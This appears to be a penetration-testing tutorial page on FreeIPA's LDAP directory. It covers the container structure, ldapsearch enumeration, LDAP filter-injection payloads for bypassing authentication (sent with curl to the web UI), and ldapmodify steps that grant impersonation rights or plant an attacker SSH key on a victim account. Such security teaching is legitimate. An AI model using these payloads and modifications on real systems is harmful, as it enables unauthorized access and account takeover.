Directory Services

Explore the LDAP directory structure in FreeIPA and techniques to test its security.

Directory Topics

Navigate through different directory service topics

LDAP Overview

FreeIPA uses 389 Directory Server (formerly Fedora Directory Server) as its LDAP component. This directory server stores information about users, groups, hosts, and other objects necessary to manage the security aspects of a network of computers.

Overview of the LDAP directory structure in FreeIPA

Important Note

FreeIPA's LDAP implementation includes additional schema elements and access controls beyond standard LDAP. Understanding these differences is crucial for effective penetration testing.

Directory Structure

The FreeIPA LDAP directory has a specific structure with several key containers that store different types of objects. Understanding this structure is essential for navigating and testing the directory.

Key Containers

FreeIPA organizes its LDAP directory into several key containers, each serving a specific purpose.

Common FreeIPA LDAP Containers

cn=accounts,dc=example,dc=com

The main container for user, group, and host accounts.

cn=users,cn=accounts,dc=example,dc=com

Contains user accounts.

cn=groups,cn=accounts,dc=example,dc=com

Contains user groups.

cn=computers,cn=accounts,dc=example,dc=com

Contains host entries.

cn=hostgroups,cn=accounts,dc=example,dc=com

Contains host groups.

cn=hbac,dc=example,dc=com

Contains Host-Based Access Control (HBAC) rules.

cn=sudo,dc=example,dc=com

Contains sudo rules.

cn=etc,dc=example,dc=com

Contains configuration information.

Exploring the Directory Structure

You can explore the FreeIPA directory structure using LDAP search commands.

Get the base naming contexts of the LDAP server

ldapsearch -x -h <target_ip> -b "" -s base

List the top-level containers

ldapsearch -x -h <target_ip> -D "uid=admin,cn=users,cn=accounts,dc=example,dc=com" -w password -b "dc=example,dc=com" -s one "(objectClass=*)"

List the containers under cn=accounts

ldapsearch -x -h <target_ip> -D "uid=admin,cn=users,cn=accounts,dc=example,dc=com" -w password -b "cn=accounts,dc=example,dc=com" -s one "(objectClass=*)"

LDAP Injection

LDAP injection is a technique where an attacker manipulates LDAP queries by injecting malicious code. This can lead to unauthorized access or information disclosure.

LDAP Filter Injection

LDAP filter injection involves manipulating LDAP search filters to bypass authentication or access unauthorized information.

Basic LDAP injection payload to bypass authentication

username=*)(uid=*))(|(uid=*

LDAP injection payload targeting admin authentication

username=admin))(|(password=*

LDAP Injection Note:

Applications that construct LDAP queries based on user input might be vulnerable to LDAP injection attacks. Modern versions of FreeIPA typically sanitize inputs, but custom integrations or older versions might be vulnerable.

Web Interface Injection

The FreeIPA web interface might be vulnerable to LDAP injection if it doesn't properly sanitize user input.

Test search functionality for LDAP injection vulnerabilities

curl -k "https://<target_ip>/ipa/ui/search?search_term=*)(uid=*)(|(uid=*"

Test login functionality for LDAP injection

curl -k -X POST "https://<target_ip>/ipa/session/login_password" -d "user=*)(uid=*))(|(uid=*&password=test"

Diagram showing how LDAP injection attacks work

Unauthorized Modifications

Unauthorized modifications involve modifying LDAP entries without proper authorization. This can lead to privilege escalation or unauthorized access.

ACL Bypass

Access Control Lists (ACLs) in FreeIPA define who can modify which attributes. Bypassing these ACLs can allow unauthorized modifications.

Attempt to modify LDAP entries using an authenticated user

ldapmodify -x -h <target_ip> -D "uid=user,cn=users,cn=accounts,dc=example,dc=com" -w password -f modify.ldif

Search for permission entries to identify potential ACL weaknesses

ldapsearch -x -h <target_ip> -D "uid=user,cn=users,cn=accounts,dc=example,dc=com" -w password -b "cn=accounts,dc=example,dc=com" -s sub "(objectClass=ipaPermission)"

ACL Bypass Note:

Look for misconfigured ACLs that might allow users to modify attributes or objects they shouldn't have access to. Pay special attention to self-service capabilities that might allow users to modify their own attributes.

Attribute Manipulation

Some attributes, if modified, can grant additional access or capabilities to attackers.

Create LDIF file to add impersonation rights

echo -e "dn: uid=victim,cn=users,cn=accounts,dc=example,dc=com changetype: modify add: objectClass objectClass: ipaAllowToImpersonate" > impersonate.ldif

Attempt to modify the victim's object to allow impersonation

ldapmodify -x -h <target_ip> -D "uid=attacker,cn=users,cn=accounts,dc=example,dc=com" -w password -f impersonate.ldif

Example: Adding an SSH Key

Create LDIF file to add an SSH key

echo -e "dn: uid=victim,cn=users,cn=accounts,dc=example,dc=com changetype: modify add: ipaSshPubKey ipaSshPubKey: ssh-rsa AAAA... attacker@example.com" > add_ssh_key.ldif

Attempt to add the SSH key

ldapmodify -x -h <target_ip> -D "uid=attacker,cn=users,cn=accounts,dc=example,dc=com" -w password -f add_ssh_key.ldif